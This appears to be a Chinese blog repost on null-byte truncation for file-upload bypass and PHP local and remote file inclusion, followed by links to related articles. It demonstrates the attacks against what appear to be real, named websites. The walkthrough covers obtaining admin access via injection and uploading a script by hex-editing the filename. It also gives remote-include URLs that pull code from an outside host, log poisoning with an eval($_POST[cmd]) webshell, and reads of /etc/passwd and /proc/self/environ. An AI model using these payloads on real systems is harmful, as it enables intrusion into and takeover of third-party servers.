php 00截断,文件上传之\00截断与文件包含之%00截断 文件包含漏洞详解 – jinglingshu的博客...

最新推荐文章于 2024-06-01 05:00:00 发布
最新推荐文章于 2024-06-01 05:00:00 发布
阅读量3.7k 收藏 7
点赞数 1
文章标签: php 00截断

首先要明确\00截断与%00截断的关系:00截断就是将上传文件的文件名或路径名中使用ascii码值为0的字符进行截断来达到突破上传限制的目的,而%00一般用在URL中用于截断url来进行文件包含。两者之间的关系是:%00是ascii值为0字符的url编码形式,两者原理其实是一样的。

一、\00的路径截断

以网站http://www.hongkonggift.com为例,该网站存在注入,通过注入获取管理员口令并进入后台,在http://www.hongkonggift.com/admin/banner_detail.asp?uid=3处可上传文件。

3895338f61a896ae43185a34c96663d6.png

结果上传后缀为.asp/asa等后缀都不成功,上传jpg文件是可以的。通过空格方式.asp .jpg也不行。下面使用截断。

(1)通过burp sulte抓包。修改文件名截断即可。为了说明\00与%00的关系,有两种修改方法。第一种 :用\00截断。即在.asp后面加个空格,然后在hex中将空格的20变为00.

212d814be8fe7d64025065b192ebc578.png

e4d44dd36b8c96f311daa1137121beb1.png

616ecb1928f278ec27e15765a6551242.png

第二种是,将文件名名为3.asp%00.jpg,然后使用burp将%00进行url解码(实际上这样获得的文件名与上面将20变为00是一样的)。

c31a33cd5406606ecf6f9655d81b72f7.png

二、文件包含漏洞

利用本地包含时常常需要用%00来截断后面的字符串,但在GPC为ON时%00是会被转义的,那么还有其他方法么?

其实以前就有人提到过用一定数量的/突破操作系统对文件名的长度限制来截断后面的字符串,详见:http://cloie.it580.com/?p=51

文里提到只可以在WIN下利用,其实部分Linux主机下也可以,只是/的数量要更多些(要使文件路径名长度大于4096字节),看看下面的代码片断:

$a=”;

for($i=0;$i<=4071;$i++) {

$a .= ‘/’;

}

$a = ‘test.txt’.$a;                //完整的路径为/var/www/test/test.txt

require_once($a.’.php’);

?>

在Linux环境下测试,你会发现’.php’被截断了,成功的包含了test.txt:)

有空就多整理下曾经研究过的知识和需要温顾的知识,明年可能去寻工作络.

关于PHP中LFI(Local File Include,本地文件包含)漏洞,大家都很熟悉了;paper很多很多,特别是国外的…不过

大家都懒得测试,我就来整理下.

1.普通本地包含;

$query=$_GET['p'];

include($query);

?>

poc:

http://127.0.0.1:8080/phpwite/include.php?p=../hanguo/test.php

../hanguo/test.php为包含的路径.

File.asp?md5=95cd50af096eaf3e6761c9b60fee4749

只要目标服务器支持上传,不管是jpg,txt,gif等都可以,在其中包含一句话木马即可,这种方法很简单没什么可说的。

2.截断本地包含

require_once($a.'.php');

include($a.".php");

//等等类似此包含的函数..

在WINDOWS下还有特别用处:

\.或者./或者\或者/截断 (WINDOWS都可以使用.)

Linux包含截断例子 (Linux ./和/可以.)

%00截断包含,有gpc=off和php版本限制

poc:

http://127.0.0.1:8080/phpwite/include.php?p=../hanguo/test.php%00

3.远程包含

在allow_url_include=On就是远程文件包含了,为off那就只能本地包含了.

测试case:

$query=$_GET['p'];

include($query.".php");

?>

连接:

http://www.xsser.com/explame.php?p=http://www.axxer.com/yeah.txt

爆错了:

Warning: main(http://www.axxer.com/yeah.txt.php): failed to open stream: HTTP request failed! HTTP/1.1 404 Not Found in

/var/www/htdocs/explame.php on line 3

include($query.".php");

代码的缘故,在后面加上了”.php“,导致yeah.txt变成了yeah.txt.php.

这里我们不需要截断啦,来个360计之—-将计就计.

在www.axxer.com创建个yeah.php文件;

然后http://www.xsser.com/explame.php?p=http://www.axxer.com/yeah,自动在后面加

上.php;多么爱。。。。

我们还可以用php自带协议来利用:

包含data:// 或者php://input 伪协议

这个漏洞对于php5.0以下有效,5.3测试失败,其他大家自行总结。还是比较鸡肋,不过不亏为一种好思路。

http://www.schnelltest24.de/index.php?page=/etc/passwd

//这个没有截断,我们尝试下用协议看看.

File.asp?md5=3b2e2d7ffa2f5d47e00e9f223ed5123a

利用协议然后POST发送利用代码,哈哈;多么有爱~~~~.

4.日记包含高级利用

此连接已经透露出技巧了呢,连接思路简单说下:

(1)访问带有一句话的错误连接(http://www.ujn.edu.cn/xxxxxxxx…),此连接将记录到error.log错误记录文件中.

(2)找到包含漏洞的地方,包含到error.log文件的路径.然后在自定义s参数中输入我们恶意代码. (http://www.ujn.edu.cn/english/depart.php?s=phpinfo();&name=../../../../../../var/log/lighttpd/error.log/././……….)

一先限制以及突破:

类似http://www.exp.com/index<?php eval($_POST[cmd]);?>.php

这样的提交,某些WEB服务器将会把空格做HTTP编码转成%20写入web日志,如果PHP包含<?php %20eval($_POST[cmd]);?>这样的语句肯定是不会成功的,所以我们必须把空格真正的写入WEB日志.

一点连接:内容1

5.其他高级利用

(1)包含/proc/self/environ环境变量:

这个是利用Linux中的环境变量作为基础,很多时候这个方法行不通,因为没有/proc/self/environ的访问权限.同读取/etc/passwd一样

File.asp?md5=12f7325a4c9d0013139a20894998bf21

利用(文章中第四点有详细介绍了.)

(2) phpinfo临时文件爆破包含. //看情况而定,有的需要%00等特殊字符截断.上面介绍过了.

(3)_SESSION爆破包含.   //看情况而定,有的需要%00等特殊字符截断.上面介绍过了.

weixin_39640845
关注
  • 1
    点赞
  • 7
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
文件上传漏洞-04】文件上传路径截断靶场实战
cc
02-16 5490
在http请求中,我们发现了"save_path",顾名思义就是文件上传的路径,也可以影响文件存储路径,而根据响应的文件路径,可以发现服务器对上传的文件进行了重命名。服务器后台采用的是move_uploaded_file()函数将上传的文件移动到新位置也就是文件另存,函数在执行的时候会有两个参数,第一个参数就是原文件的路径,第二个参数就是目标函数的路径,这两个路径都是作为字符串来出现的;注意:在http请求中,存储路径可控,是可以采用00截断的一个条件,且采用00阶段是为了使上传的文件可执行。
从源码级别了解PHP %00截断原理
zhangzhuangtongxue的博客
10-10 1万+
一:漏洞简介     PHP00截断是5.2.x版本的一个漏洞,当用户输入的url参数包含%00经过浏览器自动转码后截断后面字符。 二:漏洞示例代码      三:漏洞源码分析 四:修复代码分析
文件上传00截断详解
热门推荐
redwand的博客
02-03 2万+
00截断是操作系统层的漏洞,由于操作系统是C语言或汇编语言编写的,这两种语言在定义字符串时,都是以\0(即0x00)作为字符串的结尾。操作系统在识别字符串时,当读取到\0字符时,就认为读取到了一个字符串的结束符号。因此,我们可以通过修改数据包,插入\0字符的方式,达到字符串截断的目的。00截断通常用来绕过web软waf的白名单限制
00截断原理
weixin_45522644的博客
07-17 4054
0x00截断原理: 0x00是十六进制表示方法,是ascii码为0的字符,在有些函数处理时,会把这个字符当做结束符。系统在对文件名的读取时,如果遇到0x00,就会认为读取已结束。这个可以用在对文件类型名的绕过上。 但要注意是文件的16进制内容里的00,而不是文件名中的00 !!!就是说系统是按16进制读取文件(或者说二进制), 遇到ascii码为零的位置就停止,而这个ascii码为零的位置在16进制中是00,用0x开头表示16进制,也就是所说的0x00截断。 %00是被服务器解码为0x00发挥了截断作用。
文件包含漏洞详解
最新发布
qq_70584783的博客
06-01 319
文件包含漏洞是一种允许攻击者通过操纵输入参数,使服务器端脚本错误地包含并执行了攻击者指定的文件的安全漏洞
00截断上传绕过_关于上传中的00截断分析
weixin_39922929的博客
12-20 627
关于上传中00截断的细节,很多朋友在渗透中都会发现一些这样的有趣现象,这个站点使用00截断上传的方法上传成功了,而换一个站点又失败了,这是什么原因呢?你看了这篇文章就会明白。00截断原理0x00是字符串的结束标识符,攻击者可以利用手动添加字符串标识符的方式来将后面的内容进行截断,而后面的内容又可以帮助我们绕过检测。00截断的限制条件1PHP<5.3.29,且GPC关闭00截断的利用方法上传文...
[NCTF2019]SQLi——%00截断的“呼唤”
Mrs_H的博客
11-01 786
前言 本来是想趁这个时间点把逆向的作业做一做的,哪想到我装有工具的虚拟机突然暴毙了。抱着个电脑没什么可以做的,没事闲的又做了道sql的题目,也算是弥补了昨天没做题目的遗憾。 正文 关于%00的截断原理是这样的: 0x00是字符串的结束标识符,攻击者可以利用手动添加字符串标识符的方式来将后面的内容进行截断,而后面的内容又可以帮助我们绕过检测。 但是这道题我们不是通过%00后面的内容去绕过文件格式的过滤,我们是要通过%00帮我们把最后的引号给屏蔽掉,这是我们的最终目的。 先来看题。 题目的作者让我们去构建
php%00 截断,%00截断问题
weixin_39995280的博客
03-23 4009
一、php00截断php5.3.4中php修复了0字符,但是在之前的版本中00在php中危害较大。简单测试一下php版本<5.3.4$_GET["filename"]这样就可以接收到,这样的请求filename=test.php%00.txt主要利用常见:1.上传时路径可控,使用00截断2.文件下载时,00截断绕过白名单检查3.文件包含时,00截断后面限制(主要是本地包含时)4....
CTFHub技能书解题笔记-文件上传-00截断
qq_43006864的博客
01-12 2085
打开题目 提示我们了解一下,php 5.2 00截断,查一下相关资料吧。 截断原理: http://www.xxx.com/xx.jpg http://www.xxx.com/xx.php%00.jpg => http://www.xxx.com/xx.php 这里粗浅的说明一下本题所用到的原理,就是在.php文件后加上%00后接.jpg,这里我们就可以绕过对php文件的过滤。在执行时,%00会把后面的.jpg截断,所以执行的时候他执行的仍然是前面的.php文件。就可以实现我们的马子文件
2024.3.26日报(文件上传漏洞利用)
2302_80946742的博客
03-26 721
在这种题型中,服务器对上传的文件没有任何验证措施。这意味着攻击者可以随意上传任何类型的文件,包括恶意脚本或可执行文件。这为攻击者提供了直接的机会来利用服务器资源。这种题目涉及到Apache服务器的配置文件.htaccess。攻击者需要利用.htaccess文件来改变服务器的行为,例如允许执行PHP代码。这种题型要求攻击者利用00截断漏洞上传恶意文件。
buku---PHP代码审计—ereg正则%00截断
kuller_Yan的博客
10-21 208
buku—PHP代码审计—ereg正则%00截断 <?php $flag = "xxx"; if (isset ($_GET['password'])) { if (ereg ("^[a-zA-Z0-9]+$", $_GET['password']) === FALSE) { echo ' You password must be alphanumeric '; } else if (strlen($_GET['password']) < 8 && $_GET['passwo
php函数漏洞
h3110n3w0r1d
04-05 1781
1.intval() intval — 获取变量的整数值 说明 int intval ( mixed $var [, int $base = 10 ] ) 通过使用指定的进制 base 转换(默认是十进制),返回变量 var 的 integer 数值。 intval() 不能用于 object,否则会产生 E_NOTICE 错误并返回 1。 参数 var 要转换成 integer 的...
文件上传漏洞
qq_51003021的博客
08-19 1395
文件上传功能是很多web程序都带的一个功能,但是如果web后端没有对文件做一些安全性的限制的话,那么很有可能这个文件上传上来会破坏掉整个web程序,这就是文件上传漏洞
Linux文件系统--文件类型
Ucan_Uup的博客
09-08 970
Linux中一切都是文件,文件类型有多种,使用ls -l命令可以查看文件属性,所显示结果的第一列的第一个字符用来表示文件类型,如下: 1.普通文件 第一列第一个字符为“-”的文件为普通文件。 创建普通文件我们用:touch newfile 命令 删除普通文件我们用:rm newfile 命令 2.目录文件 第一列第一个字符为“d”(directory)的文件为目录文件。 创建目录文件我们用:mkdir directory 命令 删除空目录文件我们用:rmdir directory 命令 删除非空目录文件
文件上传详谈
m0_56691564的博客
10-29 1373
文件上传漏洞是指文件上传功能`没有对上传的文件做合理严谨的过滤`,导致用户可以利用此功能,上传能`被服务端解析执行的文件`,并通过此文件获得`执行服务端命令的能力`。
00截断 java_Java写文件时文件名00截断BUG导致的文件上传漏洞及修复
weixin_32344641的博客
02-22 450
Java在上面两种环境写文件时,会因为00截断而无法正确为新生成的文件命名。比如用户需要的用户名abc.jsp .jpg,但经过00截断后,生成的文件的名称变为abc.jsp , 因此我们在涉及到上传的文件名没更改名称或者可自定义目录的时候加以利用测试环境:1.windows7(x64)+tomcat7+jdk1.62.Linux3.0(ubuntu11.10)(x86)+tomcat7+jdk1...
Html-URL编码(%00-%ff)
hellocoding的博客
12-24 1023
下面是用 URL 编码形式表示的 ASCII 字符(十六进制格式): 从 %00 到 %8f. ASCIIValue URL-encode ASCIIValue URL-encode ASCIIValue URL-encode æ %00 0 %30 ` %60 %01 1 %31 a %61 %02 2 %32 b %62 %03 3 %33 c %63 %04 4 %34 d %64 %05 5 %35 e.
文件上传-00截断
weixin_45711977的博客
07-18 2477
文件上传-00截断
%00截断
weixin_53284312的博客
12-11 792
%00截断
HTML特殊字符的html、js、css写法汇总
◆gHOST◇的专栏
09-12 1万+
⇠  箭头类 符号 UNICODE 符号 UNICODE HTML JS CSS HTML JS CSS ⇠ &#8672 \u21E0 \21E0 ⇢ &#8674 \u21E2 \21E2 ⇡ &#8673 \u21E1 \21
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值